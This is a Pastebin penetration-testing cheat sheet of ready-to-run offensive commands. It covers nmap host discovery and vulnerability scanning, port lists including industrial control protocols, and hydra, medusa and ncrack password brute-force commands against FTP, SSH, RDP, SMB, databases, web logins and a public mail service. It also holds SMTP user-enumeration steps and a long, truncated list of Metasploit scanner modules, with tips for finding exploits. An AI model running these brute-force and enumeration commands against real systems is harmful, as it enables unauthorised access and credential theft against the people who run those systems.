API tools faq
paste
Advertisement
iscomsa

Enumeration

iscomsa
Oct 1st, 2018
9,075
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 65.62 KB | None | 0 0
raw download clone embed print report
  1. FTP - Port 21
  2. SSH - Port 22
  3. Telnet - Port 23
  4. SMTP | Port 25 and Submission Port 587
  5. DNS - Port 53
  6. Finger - Port 79
  7. HTTP
  8. Webmin
  9. Jenkins
  10. Apache Tomcat
  11. JBoss
  12. Lotus Domino httpd
  13. IIS
  14. VMware ESXi
  15. Kerberos - Port 88
  16. POP3 - Port 110
  17. RPCInfo - Port 111
  18. Ident - Port 113
  19. NetBios
  20. SNMP - Port 161
  21. Check Point FireWall-1 Topology - Port 264
  22. LDAP - Port 389
  23. SMB - Port 445
  24. rexec - Port 512
  25. rlogin - Port 513
  26. RSH - port 514
  27. AFP - Apple Filing Protocol - Port 548
  28. Microsoft Windows RPC Services | Port 135 and Microsoft RPC Services over HTTP | Port 593
  29. HTTPS - Port 443 and 8443
  30. RTSP - Port 554 and 8554
  31. Rsync - Port 873
  32. Java RMI - Port 1099
  33. MS-SQL | Port 1433
  34. Oracle - Port 1521
  35. NFS - Port 2049
  36. ISCSI - Port 3260
  37. SAP Router | Port 3299
  38. MySQL | Port 3306
  39. Postgresql - Port 5432
  40. HPDataProtector RCE - Port 5555
  41. VNC - Port 5900
  42. CouchDB - Port 5984
  43. Other
  44. Redis - Port 6379
  45. AJP Apache JServ Protocol - Port 8009
  46. PJL - Port 9100
  47. Apache Cassandra - Port 9160
  48. Network Data Management Protocol (ndmp) - Port 10000
  49. Memcache - Port 11211
  50. MongoDB - Port 27017 and Port 27018
  51. EthernetIP-TCP-UDP - Port 44818
  52. UDP BACNet - Port 47808
  53.  
  54. # Ping sweep :
  55. nmap -sP -PE -PP -PS21,22,23,25,80,113,31339 -PA80,113,443,10042 --source-port 53 -T4 -iL IPs.txt -oX discover.xml | grep "report for" | cut -d " " -f 5
  56.  
  57. nmap -n -sL -iR 50000 -oN - | grep "not scanned" | awk '{print $2}' | sort -n > 50K_IPs
  58. map -v -n -PE <target>
  59. nmap -v -n -PE -PO -PM -PP <target>
  60. nmap -v -n -PS21-23,25,53,80,443,3389 -PO -PE -PM -PP <target>
  61. nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt
  62. nmap -sL 54.248.103.0/24 -oG - | grep -v '(\w*)' | grep -v Nmap | awk '{ print $2 " " $3 }'
  63.  
  64. # scan network with Firewall :
  65. # nmap --script firewalk --traceroute 192.168.20.2
  66. # traceroute 192.168.20.2
  67. # hping3 -S 192.168.20.2 -C 100 -P ++1
  68. # hping –R 192.168.0.100
  69.  
  70. # TCP SYN/ACK, UDP or SCTP discovery to given ports
  71. nmap -PS/PA/PU/PY
  72. # ICMP echo, timestamp, and netmask request discovery probes
  73. nmap -PE/PP/PM
  74.  
  75. # Never do DNS resolution/Always resolve [default: sometimes]
  76. Never do DNS resolution | -n
  77. Always resolve | -R
  78.  
  79. # Scan Techniques
  80. TCP SYN scan -sS
  81. Connect scan -sT
  82. ACK scan -sA
  83. Window scan-sW
  84. Maimon scan -sM
  85. UDP Scan -sU
  86. TCP Null scan -sN
  87. FIN scan -sF
  88. Xmas scan -sX
  89. IP protocol scan -sO
  90. Scan UDP ports with Nmap, e.g. -p U:53,161
  91. Scan "number" most common ports --top-ports "1000"
  92.  
  93. More :
  94. https://highon.coffee/blog/nmap-cheat-sheet/
  95.  
  96.  
  97.  
  98. List of ports :
  99. 1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,105,109-111,113,123,135,137-139,143,161,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,689,705,771,783,888,902,910,912,921,993,995,998,1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3389,3460,3500,3628,3632,3690,3780,3790,3817,4000,4322,4433,4444-4445,4659,4679,4848,5000,5038,5040,5051,5060-5061,5093,5168,5247,5250,5351,5353,5355,5400,5405,5432-5433,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,6000,6050,6060,6070,6080,6101,6106,6112,6262,6379,6405,6502-6504,6542,6660-6661,6667,6905,6988,7001,7021,7071,7080,7144,7181,7210,7443,7510,7579-7580,7700,7770,7777-7778,7787,7800-7801,7879,7902,8000-8001,8008,8014,8020,8023,8028,8030,8080-8082,8087,8090,8095,8161,8180,8205,8222,8300,8303,8333,8400,8443-8444,8503,8800,8812,8834,8880,8888-8890,8899,8901-8903,9000,9002,9080-9081,9084,9090,9099-9100,9111,9152,9200,9390-9391,9495,9809-9815,9855,9999-10001,10008,10050-10051,10080,10098,10162,10202-10203,10443,10616,10628,11000,11099,11211,11234,11333,12174,12203,12221,12345,12397,12401,13364,13500,13838,14330,15200,16102,17185,17200,18881,19300,19810,20010,20031,20034,20101,20111,20171,20222,22222,23472,23791,23943,25000,25025,26000,26122,27000,27017,27888,28222,28784,30000,30718,31001,31099,32764,32913,34205,34443,37718,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48899,49152,50000-50004,50013,50500-50504,52302,55553,57772,62078,62514,65535
  100.  
  101.  
  102. This is a list of common ports that will give you a pretty good list of "alive" system when scanning internally or externally.
  103.  
  104. 21,22,23,25,79,80,88,110,111,139,143,389,443,445,514,631,2049,1352,3000,3389,4949,5060,5631,5632,5666,6000-6009,8080,8000,8443,9080,8006,8089,9443,8834,17500,5900,5901,6000-6009
  105.  
  106. easy copy - 21,22,23,25,139,443,445,631,3389,6000-6009,8080,8000,8443
  107. FTP: 21
  108. SSH: 22
  109. Telnet: 23
  110. SMTP: 25
  111. Finger: 79
  112. HTTP: 80
  113. Kerberos: 88
  114. POP3: 110
  115. SUNRPC (Unix RPC): 111 (think: rpcinfo)
  116. NetBIOS: 139
  117. IMAP 143
  118. LDAP: 389
  119. HTTPS: 443
  120. LotusNotes: 1352
  121. Microsoft DS: 445
  122. RSH: 514
  123. CUPS: 631
  124. NFS: 2049
  125. Webrick(Ruby Webserver): 3000
  126. RDP: 3389
  127. Munin: 4949
  128. SIP: 5060 *PCAnywhere: 5631 (5632)
  129. NRPE (*nix) /NSCLIENT++ (win): 5666 (evidence of Nagios server on network)
  130. Alt-HTTP: 8080
  131. Alt-HTTP tomcat: 9080
  132. Another HTTP: 8000 (mezzanine in development mode for example)
  133. Nessus HTTPS: 8834
  134. Proxmox: 8006
  135. Splunk: 8089 (also on 8000)
  136. Alt HTTPS: 8443
  137. vSphere: 9443
  138. X11: 6000-6009 (+1 to portnum for additional displays) (see xspy, xwd, xkey for exploitation)
  139. VNC: 5900, 5901+ (Same as X11; +1 to portnum for each user/dipslay over VNC. SPICE is usually in this range as well) Printers: 9100, 515
  140. Dropbox lansync: 17500
  141.  
  142.  
  143. ## UDP Discovery
  144.  
  145. easy copy - 53,123,161,1434
  146. DNS: 53
  147. XDMCP: 177 (via NSE script --script broadcast-xdmcp-discover, discover nix boxes hosting X)
  148. OpenVPN: 1194
  149. MSSQL Ping: 1434
  150. SUNRPC (Unix RPC): 111 (yeah, it's UDP, too)
  151. SNMP 161
  152. Network Time Protocol (NTP): 123
  153. syslog : 514
  154. UPNP: 1900
  155. Isakmp - 500 (ike PSK Attack)
  156. vxworks debug: 17185 (udp)
  157.  
  158. ## Authentication Ports
  159.  
  160. easy copy - 1494
  161. Citrix: 1494
  162. WinRM: 80,5985 (HTTP), 5986 (HTTPS)
  163. VMware Server: 8200, 902, 9084
  164. DameWare: 6129
  165.  
  166. ## Easy-win Ports:
  167.  
  168. Java RMI - 1099, 1098
  169. coldfusion default stand alone - 8500
  170. IPMI UDP(623) (easy crack or auth bypass)
  171. 6002, 7002 (sentinel license monitor (reverse dir traversal, sometimes as SYSTEM))
  172. GlassFish: 4848
  173. easy copy - 9060
  174. IBM Web Sphere: 9060
  175. Webmin or BackupExec: 10000
  176. memcached: 11211
  177. DistCC: 3632
  178. SAP Router: 3299
  179.  
  180. ## Database Ports
  181.  
  182. easy copy - 3306,1521-1527,5432,5433,1433,3050,3351,1583,8471,9471
  183. MySQL: 3306
  184. PostgreSQL: 5432
  185. PostgreSQL 9.2: 5433
  186. Oracle TNS Listener: 1521-1527
  187. Oracle XDB: 2100
  188. MSSQL: 1433
  189. Firebird / Interbase: 3050
  190. PervasiveSQL: 3351, 1583
  191. DB2/AS400 8471, 9471
  192. Sybase 5000
  193.  
  194. ## NoSQL Ports
  195.  
  196. easy copy - 27017,28017,27080,5984,900,9160,7474,6379,8098
  197. MongoDB: 27017,28017,27080
  198. CouchDB: 5984
  199. Hbase 9000
  200. Cassandra:9160
  201. Neo4j: 7474
  202. Redis: 6379
  203. Riak: 8098
  204.  
  205. ## SCADA / ICS
  206.  
  207. source: http://www.digitalbond.com/tools/the-rack/control-system-port-list/ )
  208.  
  209. BACnet/IP: UDP/47808
  210. DNP3: TCP/20000, UDP/20000
  211. EtherCAT: UDP/34980
  212. Ethernet/IP: TCP/44818, UDP/2222, UDP/44818
  213. FL-net: UDP/55000 to 55003
  214. Foundation Fieldbus HSETCP/1089 to 1091, UDP/1089 to 1091
  215. ICCP: TCP/102
  216. Modbus TCP: TCP/502
  217. OPC UA Binary: Vendor Application Specific
  218. OPC UA Discovery Server: TCP/4840
  219. OPC UA XML: TCP/80, TCP/443
  220. PROFINET: TCP/34962 to 34964, UDP/34962 to 34964
  221. ROC PLus: TCP/UDP 4000
  222.  
  223.  
  224. ### Vulnerable Scan ###
  225.  
  226. whatweb <ip>
  227. golismero SCAN <ip>
  228. nikto -h <ip> -p 1234 <ip>
  229. nikto -C all -h 192.168.1.1 -p 80
  230. nikto -C all -h 192.168.1.1 -p 443
  231. nmap -v -sS -sV --script=vulscan.nse --script-args vulscandb=exploitdb.csv target
  232. nmap -sS -sV --script=vulscan.nse --script-args vulscandb=exploitdb.csv -p80 target
  233. nmap -sV --script=vuln target
  234. nmap -PN -sS -sV --script=all --script-args vulscancorrelation=1 target
  235.  
  236.  
  237. ### Search for Vulnerability ###
  238. searchsploit xxx | grep linux
  239. site:exploit-db.com APP VERSION
  240. site:rapid7.com "set TARGET" Sendmail
  241. site:rapid7.com "use auxiliary" MSSQL
  242. search type:exploit port:139
  243. search samba type:exploit port:445
  244. grep rpc search Microsoft Windows RPC
  245.  
  246. ### HTTP Enumerating
  247. - Brute-force , check http , https website ,enumerate one by one
  248. - default login for service or applicatin , check reset password
  249. - check Default credentials for software
  250. - SQL-injectable GET/POST params
  251. - LFI/RFI through ?page=foo type params /etc/passwd , ../../../../../boot.ini
  252. - Check config.php and get sql login
  253. - Heartbleed / CRIME find out potential correct vhost to GET , any names that could be usernames for bruteforce/guessing
  254.  
  255. ### Xprobe2 OS fingerprinting
  256.  
  257. xprobe2 -v -p tcp:80:open IP
  258.  
  259.  
  260. ### Brute-force
  261. FTP :
  262. hydra -l superuser -P pwd.txt -v -f -e ns -t 5 -w 20 192.168.67.132 ftp >> brute_ftp.out
  263. hydra -t 5 -V -f -l root -P common.txt ftp://192.168.67.132 >> brute_ftp.out
  264. hydra -v -f -l ftp -P fpass.lst -t 10 ftp://11.11.11.11 >> brute_ftp.out
  265. hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ftp
  266. medusa -u test -P 500-worst-passwords.txt -h 10.10.10.10 -M ftp
  267. medusa -M ftp -h host -u username -p password
  268.  
  269. SSH :
  270. medusa -h 10.10.XX -P /root/pasword.txt -u root -M ssh
  271. ncrack -p ssh -u root --pass 'root' -iL in
  272. hydra -t 5 -V -f -l root -P common.txt localhost ssh >> brute_ssh.out
  273. hydra -v -l root -P 500-worst-passwords.txt 10.10.10.10 ssh >> brute_ssh.out
  274. hydra -v -l root -P fpass.lst -t 5 ssh://ip -o brute_ssh.out
  275.  
  276. Telnet :
  277. hydra -v -l root -P fpass.lst -t 5 telnet://$ip >> brute_telnet.out
  278. hydra -l username -P wordlist -t 4 -s 23 -e ns -f -v 10.10.10.10 telnet >> brute_telnet.out
  279. medusa -h 192.168.0.171 -M telnet -U user.txt -P password.txt
  280.  
  281. SMTP :
  282. medusa -M smtp -m AUTH:NTLM -U accounts.txt -p password
  283. medusa -M smtp -m EHLO:world -U accounts.txt -p password
  284.  
  285. SMTP VRFY :
  286. medusa -M smtp-vrfy -m VERB:VRFY -U accounts.txt -p domain.com
  287. smtp-user-enum -M VRFY -U /home/weak_wordlist/userall.txt -t 192.168.3.10
  288.  
  289. SMTP RCPT TO :
  290. medusa -M smtp-vrfy -m VERB:RCPT TO -U accounts.txt -p domain.com
  291.  
  292. HTTP :
  293. hydra -m /tip/ -L Userid.txt -p 12345678 -e s -V -f 10.12.80.80 http-get
  294.  
  295. HTTPS :
  296. hydra -m /tip/ -L Userid.txt -P List.txt -e s -V -f 10.12.80.80 https-get
  297.  
  298. POP3 :
  299. medusa -M pop3 -m MODE:AS400 -U accounts.txt -p password
  300. medusa -M pop3 -m DOMAIN:foo.com -U accounts.txt -p password
  301. hydra -l muts -P pass.txt my.pop3.mail pop3 >> brute_pop3.out
  302. hydra -S -l [email protected] -P password.lst pop3.live.com -s 995 pop3 >> brute_pop3.out
  303.  
  304. basic auth NTLM:
  305. hydra -m /_layouts/15/Authenticate.aspx -L id.txt -P pass.txt -e s -V -f XXX.COM https-get >> brute_ntlm.out
  306. hydra -m /webdev -l admin -P Password.txt -V -F 10.11.1.237 http-get >> brute_ntlm.out
  307. hydra -m /reports -l admin -P worst-passwords.txt -V -F xxxxx.sa http-get >> brute_ntlm.out
  308. hydra -m /webdev -l admin -P Password.txt -V -F 10.11.1.17 http-head >> brute_ntlm.out
  309.  
  310. poppassd :
  311. IMAP4 :
  312. LDAP :
  313.  
  314. SMB :
  315. hydra -v -l Administrator -P fpass.lst smb://11.1.11.1 >> brute_smb.out
  316. medusa -h 192.168.0.20 -u administrator -P passwords.txt -e ns -M smbnt >> brute_smb.out
  317. hydra -L user.txt -P pass.txt -e ns -f -v -V -w5 10.10.10.2 smb >> brute_smb.out
  318.  
  319. Cisco :
  320. hydra -f -v -P pass.txt 10.10.10.2 cisco >> brute_cisco.out
  321. hydra -m cloud -P pass.txt 192.168.1.11 cisco-enable >> brute_cisco.out
  322.  
  323. MSSQL :
  324. hydra -v -l sa -P fpass.lst -t 4 10.10.10.2 mssql -o brute_mssql.out
  325. hydra -t 5 -V -f -l sa -P "C:\pass.txt" 1.2.144.244 mssql
  326. hydra mssql://172.22.71.247:1433 -l sa -P /root/Desktop/parolalar
  327.  
  328. Oracle :
  329.  
  330. MySQL :
  331. hydra -t 5 -V -f -l root -e ns -P common.txt localhost mysql
  332. hydra -v -l root -P fpass.lst -t 1 mysql://ip -o brute_mysql.out
  333.  
  334. RDP :
  335. medusa -u administrator -P /usr/share/john/password.lst -h 10.10.10.71 -M rdp
  336. ncrack -p rdp -u administrator --pass 'password' -iL in2
  337. hydra -v -f -l administrator -P common.txt rdp://192.168.67.132 // not good
  338. ncrack -vv --user offsec -P password-file.txt rdp://10.10.10.10
  339.  
  340.  
  341. PostgreSQL :
  342. VNC :
  343.  
  344. SNMP :
  345. hydra -P password-file.txt -v 10.10.10.10 snmp
  346.  
  347. Teamspeak :
  348. hydra -l username -P wordlist -s portnumber -vV ip teamspeak >> brute_teamspeak.out
  349.  
  350. http-proxy :
  351. hydra -v -l admin -P pass.txt http-proxy://192.168.1.111 >> brute_http-proxy.out
  352.  
  353. webform :
  354. hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:S=success"
  355. hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:fail"
  356.  
  357.  
  358. Syntax:
  359. Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
  360. ###############################################################################################
  361. -h [TEXT] : Target hostname or IP address
  362. -H [FILE] : File containing target hostnames or IP addresses
  363. -u [TEXT] : Username to test
  364. -U [FILE] : File containing usernames to test
  365. -p [TEXT] : Password to test
  366. -P [FILE] : File containing passwords to test
  367. -C [FILE] : File containing combo entries. See README for more information.
  368. -O [FILE] : File to append log information to
  369. -e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
  370. -M [TEXT] : Name of the module to execute (without the .mod extension)
  371. -m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a
  372. different parameter each time and they will all be sent to the module (i.e.
  373. -m Param1 -m Param2, etc.)
  374. -d : Dump all known modules
  375. -n [NUM] : Use for non-default TCP port number
  376. -s : Enable SSL
  377. -g [NUM] : Give up after trying to connect for NUM seconds (default 3)
  378. -r [NUM] : Sleep NUM seconds between retry attempts (default 3)
  379. -R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
  380. -c [NUM] : Time to wait in usec to verify socket is available (default 500 usec).
  381. -t [NUM] : Total number of logins to be tested concurrently
  382. -T [NUM] : Total number of hosts to be tested concurrently
  383. -L : Parallelize logins using one username per thread. The default is to process
  384. the entire username before proceeding.
  385. -f : Stop scanning host after first valid username/password found.
  386. -F : Stop audit after first valid username/password found on any host.
  387. -b : Suppress startup banner
  388. -q : Display module's usage information
  389. -v [NUM] : Verbose level [0 - 6 (more)]
  390. -w [NUM] : Error debug level [0 - 10 (more)]
  391. -V : Display version
  392. -Z [TEXT] : Resume scan based on map of previous scan
  393. ##################################################################
  394.  
  395.  
  396.  
  397. # SMTP user Eum :
  398. Manuel method by telnet :
  399.  
  400. nc -nv 10.11.1.215 25
  401. VRFY root
  402. VRFY username (verifies if username exists - enumeration of accounts)
  403. EXPN username (verifies if username is valid - enumeration of user)
  404. RCPT TO:username
  405. reply 250 mean user exist
  406. reply 550 means user does not exit
  407.  
  408.  
  409. Automated tools :
  410. download : https://github.com/jbarcia/TrustedSec/tree/master/recon_scan
  411. cd /Desktop/enum
  412. ./smtprecon.py 10.11.1.22
  413.  
  414. msfconsole
  415. use auxiliary/scanner/smtp/smtp_enum
  416. set RHOSTS 10.11.1.22
  417. set USER_FILE /usr/share/seclists/Usernames/Names/names.txt
  418. exploit
  419. ##########################################################
  420. smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t 10.11.1.22 -v
  421. #########################################################
  422. ./patator.py smtp_vrfy timeout=15 host=10.11.1.22 user=FILE0 0=/usr/share/seclists/Usernames/Names/names.txt
  423. #########################################################
  424. nmap --script smtp-enum-users.nse --script-args smtp-enum-users.methods={VRFY} -p 25 10.11.1.22
  425. Notes : update file : /usr/share/nmap/nselib/data/usernames.lst
  426. ** NEED TO MAKE THREADED – VERY SLOW **
  427. SAMRDUMP.PY – (/pentest/python/impacket-examples/samrdump.py)
  428. – ./samrdump.py SNMP server
  429.  
  430.  
  431. # Mysql Enumeration:
  432.  
  433. nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1 -p 3306
  434.  
  435.  
  436.  
  437. # SNMP
  438.  
  439. it will show information about target :
  440. nmap :
  441. nmap -sU 172.16.201.130 -p161 --script=snmp-brute -Pn --script-args snmp-brute.communitiesdb=list.txt
  442. FILE : /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt
  443. python snmpbrute.py -t <ip>
  444.  
  445. use auxiliary/scanner/snmp/aix_version
  446. use auxiliary/scanner/snmp/arris_dg950
  447. use auxiliary/scanner/snmp/brocade_enumhash
  448. use auxiliary/scanner/snmp/cisco_config_tftp
  449. use auxiliary/scanner/snmp/cisco_upload_file
  450. use auxiliary/scanner/snmp/netopia_enum
  451. use auxiliary/scanner/snmp/sbg6580_enum
  452. use auxiliary/scanner/snmp/snmp_enum
  453. use auxiliary/scanner/snmp/snmp_enum_hp_laserjet
  454. use auxiliary/scanner/snmp/snmp_enumshares
  455. use auxiliary/scanner/snmp/snmp_enumusers
  456. use auxiliary/scanner/snmp/snmp_login
  457. use auxiliary/scanner/snmp/snmp_set
  458. use auxiliary/scanner/snmp/ubee_ddw3611
  459. use auxiliary/scanner/snmp/xerox_workcentre_enumusers
  460.  
  461.  
  462. #
  463.  
  464.  
  465. use auxiliary/scanner/acpp/login
  466. use auxiliary/scanner/afp/afp_login
  467. use auxiliary/scanner/afp/afp_server_info
  468. use auxiliary/scanner/backdoor/energizer_duo_detect
  469. use auxiliary/scanner/chargen/chargen_probe
  470. use auxiliary/scanner/couchdb/couchdb_enum
  471. use auxiliary/scanner/couchdb/couchdb_login
  472. use auxiliary/scanner/db2/db2_auth
  473. use auxiliary/scanner/db2/db2_version
  474. use auxiliary/scanner/db2/discovery
  475. use auxiliary/scanner/dcerpc/endpoint_mapper
  476. use auxiliary/scanner/dcerpc/hidden
  477. use auxiliary/scanner/dcerpc/management
  478. use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
  479. use auxiliary/scanner/dcerpc/windows_deployment_services
  480. use auxiliary/scanner/dect/call_scanner
  481. use auxiliary/scanner/dect/station_scanner
  482. use auxiliary/scanner/discovery/arp_sweep
  483. use auxiliary/scanner/discovery/empty_udp
  484. use auxiliary/scanner/discovery/ipv6_multicast_ping
  485. use auxiliary/scanner/discovery/ipv6_neighbor
  486. use auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
  487. use auxiliary/scanner/discovery/udp_probe
  488. use auxiliary/scanner/discovery/udp_sweep
  489. use auxiliary/scanner/dlsw/dlsw_leak_capture
  490. use auxiliary/scanner/dns/dns_amp
  491. use auxiliary/scanner/elasticsearch/indices_enum
  492. use auxiliary/scanner/emc/alphastor_devicemanager
  493. use auxiliary/scanner/emc/alphastor_librarymanager
  494. use auxiliary/scanner/finger/finger_users
  495. use auxiliary/scanner/ftp/anonymous
  496. use auxiliary/scanner/ftp/bison_ftp_traversal
  497. use auxiliary/scanner/ftp/colorado_ftp_traversal
  498. use auxiliary/scanner/ftp/ftp_login
  499. use auxiliary/scanner/ftp/ftp_version
  500. use auxiliary/scanner/ftp/konica_ftp_traversal
  501. use auxiliary/scanner/ftp/pcman_ftp_traversal
  502. use auxiliary/scanner/ftp/titanftp_xcrc_traversal
  503. use auxiliary/scanner/h323/h323_version
  504. use auxiliary/scanner/http/a10networks_ax_directory_traversal
  505. use auxiliary/scanner/http/accellion_fta_statecode_file_read
  506. use auxiliary/scanner/http/adobe_xml_inject
  507. use auxiliary/scanner/http/allegro_rompager_misfortune_cookie
  508. use auxiliary/scanner/http/apache_activemq_source_disclosure
  509. use auxiliary/scanner/http/apache_activemq_traversal
  510. use auxiliary/scanner/http/apache_mod_cgi_bash_env
  511. use auxiliary/scanner/http/apache_userdir_enum
  512. use auxiliary/scanner/http/appletv_login
  513. use auxiliary/scanner/http/atlassian_crowd_fileaccess
  514. use auxiliary/scanner/http/axis_local_file_include
  515. use auxiliary/scanner/http/axis_login
  516. use auxiliary/scanner/http/backup_file
  517. use auxiliary/scanner/http/barracuda_directory_traversal
  518. use auxiliary/scanner/http/bitweaver_overlay_type_traversal
  519. use auxiliary/scanner/http/blind_sql_query
  520. use auxiliary/scanner/http/bmc_trackit_passwd_reset
  521. use auxiliary/scanner/http/brute_dirs
  522. use auxiliary/scanner/http/buffalo_login
  523. use auxiliary/scanner/http/caidao_bruteforce_login
  524. use auxiliary/scanner/http/canon_wireless
  525. use auxiliary/scanner/http/cert
  526. use auxiliary/scanner/http/chef_webui_login
  527. use auxiliary/scanner/http/chromecast_webserver
  528. use auxiliary/scanner/http/cisco_asa_asdm
  529. use auxiliary/scanner/http/cisco_device_manager
  530. use auxiliary/scanner/http/cisco_ios_auth_bypass
  531. use auxiliary/scanner/http/cisco_ironport_enum
  532. use auxiliary/scanner/http/cisco_nac_manager_traversal
  533. use auxiliary/scanner/http/cisco_ssl_vpn
  534. use auxiliary/scanner/http/cisco_ssl_vpn_priv_esc
  535. use auxiliary/scanner/http/clansphere_traversal
  536. use auxiliary/scanner/http/coldfusion_locale_traversal
  537. use auxiliary/scanner/http/coldfusion_version
  538. use auxiliary/scanner/http/concrete5_member_list
  539. use auxiliary/scanner/http/copy_of_file
  540. use auxiliary/scanner/http/crawler
  541. use auxiliary/scanner/http/dell_idrac
  542. use auxiliary/scanner/http/dir_listing
  543. use auxiliary/scanner/http/dir_scanner
  544. use auxiliary/scanner/http/dir_webdav_unicode_bypass
  545. use auxiliary/scanner/http/dlink_dir_300_615_http_login
  546. use auxiliary/scanner/http/dlink_dir_615h_http_login
  547. use auxiliary/scanner/http/dlink_dir_session_cgi_http_login
  548. use auxiliary/scanner/http/dlink_user_agent_backdoor
  549. use auxiliary/scanner/http/dolibarr_login
  550. use auxiliary/scanner/http/drupal_views_user_enum
  551. use auxiliary/scanner/http/ektron_cms400net
  552. use auxiliary/scanner/http/elasticsearch_traversal
  553. use auxiliary/scanner/http/enum_wayback
  554. use auxiliary/scanner/http/error_sql_injection
  555. use auxiliary/scanner/http/etherpad_duo_login
  556. use auxiliary/scanner/http/f5_bigip_virtual_server
  557. use auxiliary/scanner/http/f5_mgmt_scanner
  558. use auxiliary/scanner/http/file_same_name_dir
  559. use auxiliary/scanner/http/files_dir
  560. use auxiliary/scanner/http/frontpage_login
  561. use auxiliary/scanner/http/git_scanner
  562. use auxiliary/scanner/http/gitlab_login
  563. use auxiliary/scanner/http/gitlab_user_enum
  564. use auxiliary/scanner/http/glassfish_login
  565. use auxiliary/scanner/http/goahead_traversal
  566. use auxiliary/scanner/http/groupwise_agents_http_traversal
  567. use auxiliary/scanner/http/host_header_injection
  568. use auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal
  569. use auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal
  570. use auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal
  571. use auxiliary/scanner/http/hp_imc_reportimgservlt_traversal
  572. use auxiliary/scanner/http/hp_imc_som_file_download
  573. use auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess
  574. use auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration
  575. use auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess
  576. use auxiliary/scanner/http/hp_sys_mgmt_login
  577. use auxiliary/scanner/http/http_header
  578. use auxiliary/scanner/http/http_hsts
  579. use auxiliary/scanner/http/http_login
  580. use auxiliary/scanner/http/http_put
  581. use auxiliary/scanner/http/http_traversal
  582. use auxiliary/scanner/http/http_version
  583. use auxiliary/scanner/http/httpbl_lookup
  584. use auxiliary/scanner/http/iis_internal_ip
  585. use auxiliary/scanner/http/influxdb_enum
  586. use auxiliary/scanner/http/infovista_enum
  587. use auxiliary/scanner/http/ipboard_login
  588. use auxiliary/scanner/http/jboss_status
  589. use auxiliary/scanner/http/jboss_vulnscan
  590. use auxiliary/scanner/http/jenkins_command
  591. use auxiliary/scanner/http/jenkins_enum
  592. use auxiliary/scanner/http/jenkins_login
  593. use auxiliary/scanner/http/joomla_bruteforce_login
  594. use auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner
  595. use auxiliary/scanner/http/joomla_gallerywd_sqli_scanner
  596. use auxiliary/scanner/http/joomla_pages
  597. use auxiliary/scanner/http/joomla_plugins
  598. use auxiliary/scanner/http/joomla_version
  599. use auxiliary/scanner/http/linknat_vos_traversal
  600. use auxiliary/scanner/http/linksys_e1500_traversal
  601. use auxiliary/scanner/http/litespeed_source_disclosure
  602. use auxiliary/scanner/http/lucky_punch
  603. use auxiliary/scanner/http/majordomo2_directory_traversal
  604. use auxiliary/scanner/http/manageengine_desktop_central_login
  605. use auxiliary/scanner/http/manageengine_deviceexpert_traversal
  606. use auxiliary/scanner/http/manageengine_deviceexpert_user_creds
  607. use auxiliary/scanner/http/manageengine_securitymanager_traversal
  608. use auxiliary/scanner/http/mediawiki_svg_fileaccess
  609. use auxiliary/scanner/http/mod_negotiation_brute
  610. use auxiliary/scanner/http/mod_negotiation_scanner
  611. use auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
  612. use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
  613. use auxiliary/scanner/http/mybook_live_login
  614. use auxiliary/scanner/http/netdecision_traversal
  615. use auxiliary/scanner/http/netgear_sph200d_traversal
  616. use auxiliary/scanner/http/nginx_source_disclosure
  617. use auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess
  618. use auxiliary/scanner/http/novell_file_reporter_srs_fileaccess
  619. use auxiliary/scanner/http/novell_mdm_creds
  620. use auxiliary/scanner/http/ntlm_info_enumeration
  621. use auxiliary/scanner/http/octopusdeploy_login
  622. use auxiliary/scanner/http/open_proxy
  623. use auxiliary/scanner/http/openmind_messageos_login
  624. use auxiliary/scanner/http/options
  625. use auxiliary/scanner/http/oracle_demantra_database_credentials_leak
  626. use auxiliary/scanner/http/oracle_demantra_file_retrieval
  627. use auxiliary/scanner/http/oracle_ilom_login
  628. use auxiliary/scanner/http/owa_ews_login
  629. use auxiliary/scanner/http/owa_iis_internal_ip
  630. use auxiliary/scanner/http/owa_login
  631. use auxiliary/scanner/http/pocketpad_login
  632. use auxiliary/scanner/http/prev_dir_same_name_file
  633. use auxiliary/scanner/http/radware_appdirector_enum
  634. use auxiliary/scanner/http/rails_json_yaml_scanner
  635. use auxiliary/scanner/http/rails_mass_assignment
  636. use auxiliary/scanner/http/rails_xml_yaml_scanner
  637. use auxiliary/scanner/http/replace_ext
